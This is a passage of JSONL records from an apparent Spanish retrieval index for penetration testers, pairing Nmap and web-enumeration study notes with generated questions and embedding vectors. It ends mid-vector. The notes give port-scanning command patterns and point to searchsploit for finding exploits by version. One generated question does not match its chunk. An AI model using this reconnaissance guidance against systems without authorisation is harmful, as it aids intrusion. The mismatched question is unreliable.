"pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El combo de dos pasos (patrΓ³n real)\n```bash\nnmap -p- -Pn --min-rate 5000 -n --open IP # 1) rΓ‘pido: ΒΏquΓ© puertos abren?\nnmap -sCV -p 22,80,445 IP # 2) dirigido: versiΓ³n+scripts sobre esos\n```\n`-sCV` = `-sC` (scripts default) + `-sV` (versiΓ³n). Luego `searchsploit` por versiΓ³n β†’ searchsploit.", "indexar": "ΒΏCΓ³mo me ayudo a buscar exploits basados en las versiones que detecto?", "v": [-0.04089, 0.10266, -0.09678, -0.07604, 0.0159, 0.06697, -0.08187, -0.06436, -0.04921, -0.10196, -0.0859, -0.10169, -0.18156, 0.07333, 0.05959, -0.16275, 0.07389, -0.01433, -0.0161, -0.08235, 0.0753, -0.09126, 0.00895, -0.00864, -0.01343, 0.01616, -0.00095, -0.02734, -0.04474, -0.00256, -0.11813, 0.01594, -0.00189, 0.02814, -0.11682, 0.01894, 0.03506, -0.15626, -0.02835, 0.06919, 0.02472, -0.02807, -0.10144, -0.06108, 0.07395, -0.11935, -0.08954, -0.01429, -0.06111, 0.07376, 0.0115, 0.0213, -0.25496, -0.02299, -0.03686, -0.13703, 0.15623, 0.05793, 0.09559, -0.02335, -0.09534, -0.07682, 0.10897, 0.0304, 0.00752, -0.15107, 0.0522, 0.00105, -0.03305, 0.10257, -0.00429, 0.07081, 0.05996, 0.10077, -0.04405, -0.00757, 0.06694, -0.05292, 0.08204, -0.00013, -0.03562, -0.04067, -0.06069, 0.04468, -0.11101, -0.04862, 0.09584, 0.01674, -0.04701, -0.12164, 0.01787, -0.04258, -0.05119, 0.04932, -0.00041, -0.09071, 0.14578, -0.03767, -0.0052, 0.12227, -0.04928, -0.10606, -0.10182, 0.0765, -0.02053, 0.03922, -0.00522, 0.01294, -0.10547, -0.03039, 0.05518, -0.04414, 0.00351, 0.02403, 0.02573, 0.08506, 0.0426, -0.04593, -0.02314, -0.08494, -0.1356, 0.0136, -0.05999, -0.01159, 0.05278, -0.07136, -0.08704, 0.09161, 0.00554, -0.00972, -0.00611, -8e-05, -0.01943, 0.00235, -0.01837, 0.04617, 0.06967, -0.01921, -0.09056, -0.06357, 0.04938, 0.01174, -0.00708, -0.03186, -0.00844, 0.05248, 0.05143, 0.06183, -0.04228, -0.07988, -0.12684, -0.07499, -0.01433, 0.0651, -0.06786, -0.05792, 0.09308, -0.03916, -0.04697, 0.0841, 0.05163, -0.02461, 0.00565, -0.09536, 0.02581, -0.0099, -0.03148, -0.03935, -0.0569, -0.01824, -0.03317, 0.03373, 0.00905, -0.07696, 0.01431, -0.01598, -0.05176, -0.0523, -0.00841, 0.01086, 0.00477, 0.01297, 0.00015, 0.01287, 0.06512, -0.01662, 0.05064, -0.01666, -0.01878, -0.06932, 0.12645, -0.01389, 0.02068, 0.04071, -0.04312, -0.005, -0.02091, 0.01328, 0.01061, 0.00893, -0.08946, -0.03488, -0.06506, 0.0094, -0.02807, -0.05028, -0.05218, 0.01658, -0.03984, 0.01146, -0.02942, 0.02181, 0.01551, -0.06624, -0.05672, -0.04528, -0.03532, 0.00343, -0.03442, -0.0145, -0.03756, 0.10729, 0.04762, 0.04449, -0.08512, 0.00328, 0.00385, -0.01431, -0.00855, -0.00381, 0.07113, 0.03291, -0.00769, -0.02713, -0.01192, -0.06711, 0.02127, 0.06016, -0.03718, -0.0687, 0.0417, 0.0679, 0.08372, 0.00819, -0.03227, -0.01743, -0.00528, 0.02501, -0.01747, 0.00818, -0.00012, -0.01825, 0.02921, -0.07187, 0.0628, -0.05437]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Salida\n- `-oN` normal (legible, los NSE salen aquΓ­) Β· `-oG` greppable (1 lΓ­nea/host, ideal `grep`) Β· `-oA` los 3.\n- Greppeo de resultados β†’ Bucles bash sobre IPs.", "indexar": "con que opciΓ³n del comando grep puedo ver los nΓΊmeros de serie en lugar de solo los hostnames?", "v": [0.10617, 0.03401, -0.06814, -0.14096, 0.00095, -0.05769, 0.0848, -0.02608, -0.00161, -0.08587, -0.12057, -0.12033, 0.07812, -0.1491, 0.1145, 0.01603, 0.02555, -0.06659, 0.01766, 0.04026, -0.0269, -0.00184, 0.05544, 0.03247, -0.00703, -0.00063, 0.03535, 0.03879, -0.18248, -0.07915, -0.0275, -0.10966, 0.03388, -0.05315, -0.05978, 0.02128, 0.01362, 0.07155, 0.00566, 0.09841, -0.06449, -0.02313, -0.14096, 0.0253, 0.02367, -0.02495, -0.03379, 0.04109, 0.04569, -0.14193, -0.0539, -0.07568, -0.11411, -0.06803, -0.04841, 0.02441, 0.09131, 0.02429, -0.05427, 0.03395, -0.08335, -0.11167, 0.04376, 0.04494, 0.00913, 0.03437, -0.05615, -0.03163, -0.05429, -0.0455, -0.09243, 0.11129, -0.08222, -0.00394, 0.08052, 0.01737, 0.01746, -0.09626, 0.0873, -0.09675, -0.0478, -0.02473, -0.04882, -0.00719, -0.09191, -0.04966, -0.0856, -0.08134, -0.02268, -0.03835, 0.09175, 0.00314, 0.06781, 0.17024, -0.00327, -0.02016, 0.08637, 0.09218, 0.02002, 0.03397, 0.05275, 0.10306, -0.12251, 0.19236, 0.13001, 0.11421, 0.09377, 0.0389, -0.05544, -0.01815, -0.00543, -0.03379, -0.02951, -0.01019, -0.11271, -0.14124, 0.01349, 0.05336, 0.07488, -0.05323, -0.12315, -0.05092, 0.04375, 0.01243, 0.02501, -0.00338, -0.01532, -0.04109, 0.17457, -0.00895, -0.08705, -0.01171, 0.06389, -0.06785, -0.02895, 0.05684, -0.00354, 0.01184, 0.02234, -0.04921, 0.04431, 0.11156, 0.00944, -0.01442, 0.06255, -0.05542, 0.01503, -0.04827, -0.02358, 0.0263, 0.02505, 0.04913, -0.05397, 0.08804, -0.04088, 0.07213, 0.02091, -0.08632, 0.02352, -0.01074, -0.03322, -0.06429, -0.08083, -0.02105, 0.03458, -0.05346, -0.00559, 0.03385, 0.07798, -0.0311, -0.05168, 0.11723, -0.05919, -0.01549, -0.00951, -0.0338, -0.04818, -0.04606, -0.05013, -0.03607, -0.00754, -0.00795, 0.03044, -0.01423, 0.02685, 0.03138, -0.01506, -0.04605, 0.00337, 0.02403, -0.00321, 0.09448, -0.13069, 0.03365, -0.06451, -0.01987, 0.01606, 0.01513, -0.01703, -0.06763, -0.08119, 0.04878, 0.04077, -0.01851, 0.04911, -0.02545, -0.05554, 0.09602, -0.01107, 0.0019, -0.00537, -0.07381, 0.07032, -0.03943, -0.12671, -0.04438, 0.00439, -0.02474, -0.00527, 0.02845, 0.05618, 0.00086, 0.06135, -0.02011, -0.02062, 0.02306, 0.0381, -0.01223, 0.04135, 0.02973, -0.04007, -0.01506, -0.00645, -0.01342, 0.0154, 0.01633, 0.06924, 0.02159, -0.07338, 0.00715, -0.00099, 0.07842, -0.00368, -0.02931, -0.01292, -0.04274, -0.10469, 0.07606, -0.02481, -0.06694, -0.04006, 0.03464, -0.00646, -0.03704, -0.0252, -0.01309]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Salida\n- `-oN` normal (legible, los NSE salen aquΓ­) Β· `-oG` greppable (1 lΓ­nea/host, ideal `grep`) Β· `-oA` los 3.\n- Greppeo de resultados β†’ Bucles bash sobre IPs.", "indexar": "quΓ© formato de salida me permite filtrar resultados fΓ‘cilmente con bucles en bash?", "v": [0.13671, 0.07819, -0.1348, -0.07074, -0.05452, -0.11249, -0.0878, -0.07244, -0.00106, -0.16041, -0.05086, -0.0116, -0.06864, 0.04385, -0.00648, -0.07806, -0.2183, -0.11701, -0.07509, -0.07364, 0.09614, -0.10609, -0.19461, -0.07695, -0.03904, -0.04873, 0.01622, 0.06908, -0.14111, -0.05288, 0.03203, 0.05024, 0.06219, 0.00177, -0.00275, -0.00976, -0.01686, -0.00046, -0.13948, 0.12628, -0.12194, -0.0047, -0.04716, 0.10351, 0.05912, -0.15546, -0.03692, 0.12527, 0.032, -0.07166, 0.03403, -0.05833, -0.15278, 0.17516, -0.05167, -0.11895, 0.02963, -0.05246, -0.07282, 0.00357, -0.07436, -0.04796, 0.09851, 0.07766, -0.01496, 0.01929, 0.11744, -0.07133, -0.04777, -0.00129, -0.02887, -0.02186, -0.00042, 0.05514, -0.0299, 0.02232, -0.0985, 0.00305, 0.04376, 0.03296, 0.05342, -0.07098, 0.05799, 0.03867, -0.05541, 0.00948, -0.01655, -0.09301, -0.04184, -0.02769, 0.01391, -0.06948, 0.06674, 0.02451, -0.0809, -0.03797, 0.03117, 0.10382, -0.12293, 0.01354, -0.04602, 0.03421, -0.07812, 0.124, -0.02899, -0.02633, 0.01392, -0.03124, -0.13112, 0.08758, -0.04376, 0.01832, 0.05466, -0.07417, -0.02961, 0.00193, 0.07958, -0.00915, -0.0572, -0.00584, 0.01451, -0.00265, -0.02889, -0.03722, 0.04453, -0.00371, 0.05712, 0.01943, -0.03693, -0.00061, 0.03888, 0.0922, -0.08084, -0.0444, 0.02328, -0.03969, -0.0245, -0.03106, 0.01898, -0.16803, 0.02207, -0.02129, -0.04317, -0.02131, 0.0401, -0.09903, 0.12641, -0.10037, -0.05684, -0.03546, 0.0084, -0.07022, 0.03006, 0.00168, -0.06262, 0.01462, 0.04002, -0.07422, -0.01793, 0.01984, 0.00108, 0.06538, -0.06273, 0.05034, 0.01213, -0.02759, 0.01469, -0.07977, 0.01454, 0.00865, -0.016, 0.00997, -0.03296, -0.05698, 0.04261, 0.075, -0.07183, -0.02243, 0.02385, -0.01692, -0.00614, 0.08957, 0.00987, -0.04421, -0.01548, -0.02495, -0.01116, -0.0244, -0.03609, -0.00366, 0.01396, 0.07648, -0.01318, -0.13119, 0.01897, -0.04976, -0.01992, -0.07355, -0.00668, 0.01822, -0.02937, 0.02092, 0.05047, -0.03633, -0.00033, 0.02584, -0.06422, 0.02198, 0.03682, 0.00079, 0.00859, 0.03686, 0.04834, -0.0501, -0.04828, 0.07421, 0.0477, -0.07378, 0.07316, 0.04307, -0.02127, -0.00252, 0.03652, 0.03281, -0.00946, -0.00209, 0.0119, -0.01565, -0.01749, 0.00013, -0.0034, -0.02743, -0.10297, -0.01006, -0.00951, -0.01119, -0.03358, -0.02149, -0.02469, -0.07816, 0.03391, -0.03258, -0.03006, 0.00306, -0.01642, -0.04953, -0.0703, 0.05212, -0.01468, -0.03266, -0.07235, 0.03139, 0.0381, -0.04276, 0.00809, -0.05399]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- El top-1000 **ya** incluye 80/443/22/445. Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**, no es el scan.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en un /24 = ruido (256 hosts \"up\" falsos). `-Pn` es para **1 host concreto**.\n- ConfusiΓ³n clΓ‘sica: **SNMP = UDP/161 (`-sU`)**, **SMTP = TCP/25 (`-sS`)**.\n\nRelacionado: Nmap NSE Β· searchsploit Β· Trampas de enumeraciΓ³n Β· SMB Β· OSCP MOC", "indexar": "ΒΏcΓ³mo puedo saber si una mΓ‘quina estΓ‘ realmente viva o es ruido al hacer un escaneo?", "v": [-0.31919, -0.01637, -0.17604, 0.04782, -0.01504, -0.08733, -0.17925, -0.0429, 0.05347, -0.22938, -0.10882, -0.09264, 0.08087, 0.001, 0.05836, 0.01396, 0.02463, 0.10889, 0.01335, 0.09935, 0.00555, -0.13783, -0.14101, 0.0525, -0.02916, 0.0989, 0.03121, 0.14175, -0.1552, 0.04537, -0.01806, 0.13954, 0.15673, -0.10978, -0.11342, -0.0005, 0.12531, -0.01829, 0.1287, 0.07508, -0.03997, 0.01121, 0.01052, -0.06663, 0.0205, -0.08633, -0.0471, -0.02517, -0.02001, 0.05793, -0.08861, -0.05041, 0.03168, 0.00511, -0.03551, -0.10476, 0.08877, 0.02085, 0.09696, -0.18366, -0.05306, 0.01283, -0.01152, 0.03991, -0.06741, 0.03533, 0.08222, 0.01148, 0.10698, -0.02019, -0.06569, -0.02718, 0.01358, 0.00622, 0.01363, -0.04981, 0.0533, -0.08583, 0.0685, 0.04751, 0.06133, 0.04847, 0.01642, -0.0827, -0.02225, 0.01153, 0.02906, -0.05209, 0.00801, -0.03389, -0.08087, 0.10556, 0.02192, 0.01134, 0.11239, 0.01817, 0.0817, -0.03943, -0.02405, 0.07225, 0.05767, -0.01622, -0.03931, 0.00714, -0.00963, 0.07662, 0.00877, -0.11624, -0.00143, -0.04748, -0.05182, 0.07669, -0.13772, 0.00993, -0.05367, 0.03331, 0.00304, -0.0011, 0.03958, 0.06532, -0.05018, 0.07514, 0.0317, -0.08672, -0.02298, -0.03317, 0.03634, 0.03075, 0.05024, 0.03326, 0.02462, 0.01832, 0.071, -0.01396, 0.01904, -0.02541, 0.01053, -0.06782, 0.02653, -0.09407, -0.00681, 0.06657, -0.07755, -0.06934, -0.05838, 0.02723, -0.02866, -0.06686, 0.01344, 0.0009, 0.05026, -0.0035, 0.03952, 0.02769, 0.00609, 0.05102, 0.03831, -9e-05, 0.00415, 0.01793, 0.01412, 0.06371, -0.06094, -0.05391, 0.00552, 0.00639, -0.05822, 0.00653, -0.02604, -0.01026, -0.02102, -0.04925, 0.0688, -0.05424, -0.04316, 0.02279, 0.00744, 0.02364, 0.05565, -0.03036, -0.02898, 0.1001, -0.02745, -0.07232, 0.04635, 0.02331, 0.0374, 0.00897, -0.11957, 0.01575, 0.06425, 0.06061, 0.02493, -0.02906, 0.0315, -0.01751, 0.04291, -0.04909, -0.00781, -0.02308, -0.06393, -0.02123, -0.00684, 0.00711, 0.01437, 0.01841, -0.02522, -0.06847, 0.03446, 0.02438, 0.03882, 0.0352, -0.03307, -0.02664, -0.01937, 0.05777, -0.0226, -0.01083, 0.00726, -0.01614, 0.01055, 0.01125, 0.03194, 0.01405, -0.01292, 0.00371, 0.04143, -0.04379, 0.05346, 0.06223, 0.00701, 0.00789, 0.04368, 0.02177, -0.05337, 0.06847, -0.03816, 0.00714, -0.0567, -0.05483, 0.02495, 0.00276, 0.00993, 0.00803, 0.03949, -0.01995, 0.00755, 0.0072, -0.08843, -0.03537, 0.00139, -0.0063, -0.01303, 0.00136, 0.0258, 0.03081]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- El top-1000 **ya** incluye 80/443/22/445. Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**, no es el scan.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en un /24 = ruido (256 hosts \"up\" falsos). `-Pn` es para **1 host concreto**.\n- ConfusiΓ³n clΓ‘sica: **SNMP = UDP/161 (`-sU`)**, **SMTP = TCP/25 (`-sS`)**.\n\nRelacionado: Nmap NSE Β· searchsploit Β· Trampas de enumeraciΓ³n Β· SMB Β· OSCP MOC", "indexar": "quΓ© diferencia hay entre que un puerto estΓ© abierto y que solo sea filtrado por un firewall?", "v": [-0.05271, -0.05152, -0.14621, -0.0653, -0.05857, -0.05526, 0.03891, -0.0946, -0.11604, -0.14117, -0.001, 0.03799, 0.00974, -0.03824, 0.00915, -0.13263, -0.05959, 0.02617, 0.03576, -0.124, -0.11659, 0.00476, -0.00432, -0.18687, -0.03832, -0.0491, 0.03921, 0.06926, -0.08559, -0.0871, 0.11303, 0.04833, 0.21603, 0.02018, 0.03704, 0.04368, 0.10037, 0.04798, 0.10188, 0.0191, -0.0147, 0.01716, 0.02061, 0.04786, 0.09576, -0.10673, -0.14055, -0.04888, 0.14301, 0.05633, 0.02077, -0.07846, 0.00323, 0.04016, 0.02319, 0.06683, 0.06483, -0.0122, 0.03844, -0.05749, -0.13935, -0.03753, 0.09149, -0.08429, -0.05449, -0.12273, -0.02439, 0.03112, -0.0196, 0.056, -0.02895, -0.09837, 0.00927, -0.00696, -0.01335, 0.01079, -0.02384, 0.03059, 0.01112, 0.0804, -0.00896, 0.00354, 0.04216, -0.09631, -0.07803, -0.10284, -0.08587, -0.02359, -0.02867, -0.10651, 0.06083, 0.01369, -0.15429, 0.05608, 3e-05, 0.00036, -0.01915, 0.07739, -0.104, -0.00622, 0.06164, 0.02154, -0.10062, 0.06924, 0.09359, 0.03722, -0.04662, -0.12935, 0.00727, -0.01816, 0.00673, 0.0819, 0.03864, -0.07799, -0.00999, -0.0388, -0.05033, -0.10276, 0.05899, -0.03842, -0.03987, -0.08852, -0.16581, 0.0019, 0.02286, 0.01536, 0.06742, 0.08297, -0.00738, 0.04174, -0.0082, -0.0046, -0.14296, -0.03293, -0.041, -0.05021, -0.04127, -0.09788, -0.04273, -0.02326, -0.01198, 0.01572, -0.02049, 0.00228, 0.01981, 0.0029, -0.01058, -0.0939, -0.1585, -0.02962, -0.02054, -0.01458, -0.07179, 0.05264, -0.09589, 0.01073, 0.01632, -0.05793, -0.03164, 0.09054, 0.06456, 0.05579, -0.04203, -0.00033, 0.0554, -0.02062, -0.10722, -0.0056, 0.0626, -0.03422, -0.03442, 0.1224, -0.07026, -0.03706, -0.04092, -0.0088, -0.04118, -0.00468, -0.04613, 0.02104, 0.01307, 0.00737, -0.02008, -0.08009, -0.04012, -0.07487, -0.08071, -0.05316, -0.0491, 0.07507, 0.02487, 0.00841, -0.01891, 0.00943, -0.01944, 0.00573, -0.01841, -0.06015, 0.06712, 0.0287, -0.00829, -0.02849, 0.03998, -0.03715, 0.01413, 0.02066, -0.07474, -0.00091, 0.04136, 0.07996, 0.08001, 0.02003, -0.00916, -0.03492, 0.00765, 0.10432, 0.02904, 0.02585, 0.05568, 0.04477, 0.01505, 0.08048, -0.02402, -0.01262, -0.02012, 0.03205, -0.02992, -0.00929, 0.04021, 0.01127, 0.0406, -0.02896, -0.0332, -0.00126, 0.01184, 0.05709, -0.03274, -0.0253, 0.02156, -0.08625, 0.00343, -0.02541, 0.03378, -0.04807, 0.04381, -0.05693, -0.06001, 0.0571, -0.01344, -0.04396, -0.13178, 0.00533, -0.00581, -0.01494, 0.02347, -0.00062]} +{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- El top-1000 **ya** incluye 80/443/22/445. Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**, no es el scan.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en un /24 = ruido (256 hosts \"up\" falsos). `-Pn` es para **1 host concreto**.\n- ConfusiΓ³n clΓ‘sica: **SNMP = UDP/161 (`-sU`)**, **SMTP = TCP/25 (`-sS`)**.\n\nRelacionado: Nmap NSE Β· searchsploit Β· Trampas de enumeraciΓ³n Β· SMB Β· OSCP MOC", "indexar": "cuΓ‘l es el mejor modo para escanear un rango de red completo sin recibir tantos falsos positivos?", "v": [0.05815, 0.01709, -0.13897, 0.12615, 0.03617, -0.04314, -0.01864, -0.1182, -0.12731, -0.03956, -0.13189, -0.13078, 0.01281, -0.05913, 0.1493, 0.06866, -0.17763, 0.06473, 0.09464, 0.01964, -0.06399, -0.1998, -0.04963, -0.14243, 0.09102, 0.06817, 0.05531, 0.05992, 0.00827, -0.00639, 0.2223, 0.02916, -0.00966, -0.00685, 0.04883, 0.04877, 0.09831, 0.05878, -0.05175, 0.06593, 0.04259, -0.01755, -0.05532, -0.08657, 0.03848, -0.0631, -0.05904, 0.11275, 0.03147, -0.0167, -0.00088, -0.01899, -0.03682, -0.06214, -0.09055, -0.13957, 0.01054, 0.03313, 0.063, -0.0706, -0.00179, 0.13367, 0.02205, 0.02223, 0.03592, -0.0629, 0.03184, 0.03877, 0.00765, -0.07994, -0.01195, 0.09902, -0.07819, -0.00879, -0.07331, 0.01401, -0.06023, -0.07081, -0.04378, -0.04588, 0.14641, -0.05203, -0.05315, 0.09786, -0.03352, -0.06403, 0.03285, -0.11565, 0.0163, -0.11443, 0.04332, -0.017, 0.04471, -0.06726, 0.03238, 0.01491, 0.05569, -0.06009, -0.1019, -0.00894, 0.02372, -0.08619, -0.07362, 0.07633, -0.02565, 0.09099, -0.04505, -0.09435, 0.07046, -0.02042, -0.07437, -0.06015, -0.06027, 0.06935, -0.01531, -0.06467, -0.00838, -0.0534, -0.01498, 0.02941, -0.13872, -0.00416, -0.0435, 0.01219, 0.04966, -0.02857, 0.01639, -0.07029, 0.14192, 0.08832, -0.07198, -0.00955, -0.05053, -0.09721, -0.04358, -0.07193, 0.00997, -0.07531, -0.01672, -0.02437, -0.00463, 0.07076, -0.05796, -0.08581, -0.04335, 0.00486, -0.0034, -0.06409, -0.02636, -0.00367, -0.03718, 0.12967, 0.08472, 0.02838, -0.08177, 0.03878, 0.03803, -0.0857, 0.021, 0.12332, -0.01058, 0.01103, 0.01219, 0.02019, 0.03754, -0.04907, 0.0184, -0.01146, -0.00135, -0.08836, 0.0118, 0.07287, -0.06893, -0.07639, 0.00219, -0.00568, -3e-05, -0.05495, 0.00848, -0.03632, 0.0201, 0.00057, 0.04687, 0.04138, 0.03862, -0.04228, -0.02124, 0.0123, 0.03748, 0.01593, 0.05534, -0.02652, -0.00672, -0.03369, 0.05388, 0.05834, 0.06886, -0.02941, 0.06349, -0.05604, 0.0062, -0.075, -0.02247, -0.02063, 0.04447, -0.03616, -0.01414, -0.01683, -0.02201, 0.08111, 0.05451, -0.08392, 0.04018, -0.07755, -0.02139, -0.03631, 0.02684, -0.00733, 0.0443, -0.01189, 0.04535, -0.02102, 0.03958, 0.00145, -0.07202, 0.01707, -0.01582, -0.01504, 0.01195, 0.04585, -0.03039, 0.01661, -0.02413, -0.02657, 0.01442, -0.00872, 0.07501, 0.05507, -0.04441, -0.0521, 0.0382, 0.02936, -0.05371, -0.0494, -0.02087, -0.02782, -0.0649, 0.02218, 0.04217, -0.10062, -0.03543, 0.01371, -0.01479, -0.04358, 0.04514, -0.06072]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n web\n\n> Puertos 80/443/8080. El vector web es el foothold mΓ‘s comΓΊn en standalones. Parte de EnumeraciΓ³n.\n> Para la **metodologΓ­a de ataque** (quΓ© probar en cada input) ve a Hacking web; aquΓ­ solo enumeras.", "indexar": "con quΓ© puedo hacer la primera parte de un ataque a sitios web?", "v": [-0.11429, 0.14671, -0.12757, 0.02672, -0.0344, -0.02493, 0.04241, -0.07085, -0.03329, -0.01165, 0.02731, -0.04497, -0.0267, -0.02242, 0.09044, -0.00773, 0.12607, 0.04899, 0.10218, -0.12749, -0.04786, -0.03911, -0.01702, 0.00408, -0.0666, -0.06748, 0.07882, 0.07913, -0.11407, -0.02852, -0.03787, 0.01547, -0.00211, 0.05661, 0.06809, -0.07881, 0.04045, 0.07673, 0.07345, -0.00894, -0.08146, -0.08094, -0.17058, -0.00654, 0.01171, -0.00794, -0.09167, -0.04711, 0.05969, -0.0961, 0.04042, 0.01397, -0.15663, -0.11692, -0.02831, 0.00015, 0.12946, -0.15078, 0.03105, -0.00674, -0.11779, 0.06967, -0.00255, -0.02424, 0.01891, -0.02102, -0.03158, 0.10464, -0.00671, -0.02525, 0.03266, -0.00082, 0.01604, -0.02927, 0.10709, -0.02589, 0.05316, 0.0666, 0.00301, -0.01492, 0.00449, -0.00626, -0.08745, -0.01556, -0.09456, 0.01565, -0.03214, -0.11511, -0.06002, -0.10098, 0.06975, 0.05113, -0.03401, -0.02116, -0.10295, -0.12061, 0.03445, -0.03079, 0.00526, -0.05325, 0.00062, -0.06303, -0.11223, 0.08505, 0.06944, 0.06122, 0.01808, -0.06556, -0.02101, -0.12029, -0.01744, -0.0749, -0.14379, -0.09949, -0.05907, -0.02411, -0.05743, -0.02849, 0.02752, -0.02449, -0.1214, -0.00238, -0.07052, 0.03689, -0.06705, 0.03688, 0.02701, 0.02761, -0.05713, -0.03341, -0.00347, -0.00567, 0.01701, -0.01776, -0.00728, 0.05764, 0.03101, -0.0491, 0.02829, -0.01852, 0.0315, 0.04695, -0.04633, 0.00591, -0.01891, 0.01464, -0.04537, -0.04859, -0.20639, 0.0448, -0.08702, 0.06722, -0.00232, 0.05777, -0.0369, -0.01542, -0.04863, -0.00904, 0.05984, 0.08673, -0.03142, 0.0722, -0.00466, 0.08477, 0.02271, -0.04079, -0.07796, 0.04097, 0.09685, 0.07859, -0.04021, 0.05375, -0.02384, -0.13093, 0.04062, 0.01645, -0.05914, -0.03836, 0.08427, -0.04635, 0.00239, -0.05556, -0.12011, 0.06508, -0.07099, -0.0387, 0.01987, -0.01062, -0.01441, 0.09331, -0.02503, -0.00015, -0.02045, 0.06558, 0.08241, -0.06081, -0.02178, 0.03174, 0.037, 0.02361, -0.0263, -0.06008, -0.02213, -0.04213, -0.00411, 0.09241, -0.04989, -0.06935, -0.07143, 0.05367, 0.01242, -0.02295, 0.06542, -0.1051, -0.07562, -0.03258, 0.06395, -0.03861, -0.07551, 0.0314, 0.12063, 0.00163, -0.01489, 0.0521, 0.06199, 0.01917, 0.05524, -0.05326, 0.03374, 0.06366, -0.00972, -0.08319, -0.00353, -0.05171, 0.03077, -0.02548, 0.01478, 0.01524, -0.14418, 0.01781, -0.04172, -0.01305, -0.04221, -0.05236, 0.03968, -0.0831, -0.08398, 0.03053, -0.03709, -0.02672, -0.04711, -0.02481, 0.08076, 0.00848, 0.04846, -0.00313]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n web\n\n> Puertos 80/443/8080. El vector web es el foothold mΓ‘s comΓΊn en standalones. Parte de EnumeraciΓ³n.\n> Para la **metodologΓ­a de ataque** (quΓ© probar en cada input) ve a Hacking web; aquΓ­ solo enumeras.", "indexar": "cual es el mΓ©todo mΓ‘s comΓΊn para encontrar puntos de entrada en pΓ‘ginas web?", "v": [-0.08024, 0.16905, -0.08418, -0.14736, -0.10391, -0.18965, 0.03138, -0.05937, -0.09778, -0.07175, -0.06538, -0.02412, 0.00197, -0.00248, 0.09052, -0.02336, 0.17439, -0.10634, 0.09512, -0.10583, -0.08195, -0.13794, -0.08945, -0.02006, -0.09915, -0.00565, 0.02407, 0.02276, -0.06547, 0.03018, -0.01705, -0.02634, -0.03904, 0.00936, -0.18075, -0.01803, 0.18415, 0.09988, -0.04739, 0.00405, -0.14051, -0.07259, -0.13408, 0.01578, -0.01515, -0.07586, 0.04394, 0.02474, -0.02869, -0.03376, -0.00825, 0.05958, -0.12149, -0.00835, -0.11499, -0.04683, 0.07468, 0.0103, -0.04221, -0.03068, -0.08665, 0.04887, -0.06223, -0.08754, -0.02807, -0.07089, 0.00559, 0.06661, 0.03812, 0.08827, 0.05711, -0.0409, 0.04988, -0.09928, 0.0887, 2e-05, 0.04536, 0.04249, 0.06106, -0.0444, 0.06886, -0.0983, -0.11163, -0.04539, -0.1151, -0.0899, 0.05622, -0.11178, -0.05118, -0.05325, 0.07638, -0.0452, 0.03494, -0.05664, -0.05875, -0.14008, 0.0066, 0.01916, 0.00123, -0.07368, 0.01109, -0.04655, -0.11054, 0.05929, 0.01937, -0.01695, -0.0638, 0.08004, -0.1046, -0.05102, 0.08635, 0.02596, -0.02585, -0.00274, -0.08715, 0.01202, 0.04734, 0.07151, -0.04771, -0.07955, -0.04976, 0.03773, -0.12466, -0.02178, 0.01272, -0.00018, 0.08883, -0.02819, 0.01211, -0.05142, 5e-05, -0.03068, -0.05083, 0.08013, 0.06825, 0.06279, 0.03217, -0.01781, -0.07033, 0.03726, 0.06493, -0.02451, -0.0676, -0.05486, 0.02045, -0.08536, 0.07829, -0.02979, -0.14569, -0.05978, -0.07853, 0.0235, -0.00843, 0.01703, 0.05293, -0.04898, 0.05627, -0.04393, -0.0363, 0.04886, -0.03788, 0.05202, 0.06525, 0.01161, -0.01413, 0.02868, -0.13219, 0.01609, 0.03528, -0.03661, 0.03536, 0.12398, 0.00236, -0.06272, 0.03893, 0.01118, -0.06198, -0.08298, 0.05747, 0.03317, 0.02809, 0.02554, 0.00153, 0.02274, -0.00877, 0.01108, 0.07865, 0.0065, 0.01357, 0.0206, -0.01782, -0.0432, -0.05614, -0.00821, -0.01628, 0.03395, -0.03402, -0.03877, 0.06008, -0.04661, -0.03961, -0.02115, 0.01327, 0.02608, -0.0142, -0.02544, -0.0376, -0.08887, 0.01164, 0.02856, 0.02119, -0.07596, -0.00135, -0.07997, -0.03829, -0.06871, -0.04093, -0.0806, -0.01673, 0.02937, 0.08463, -0.01267, -0.04492, 0.02178, -0.00579, -0.02643, -0.00383, 0.00484, 0.00142, 0.02907, -0.05196, -0.08407, 0.00381, 0.01585, 0.00107, 0.01583, 0.04562, 0.02528, -0.02861, -0.01151, -0.0105, -0.01689, 0.02562, 0.02916, 0.00306, -0.00044, -0.05391, -0.02137, 0.03483, -0.00978, 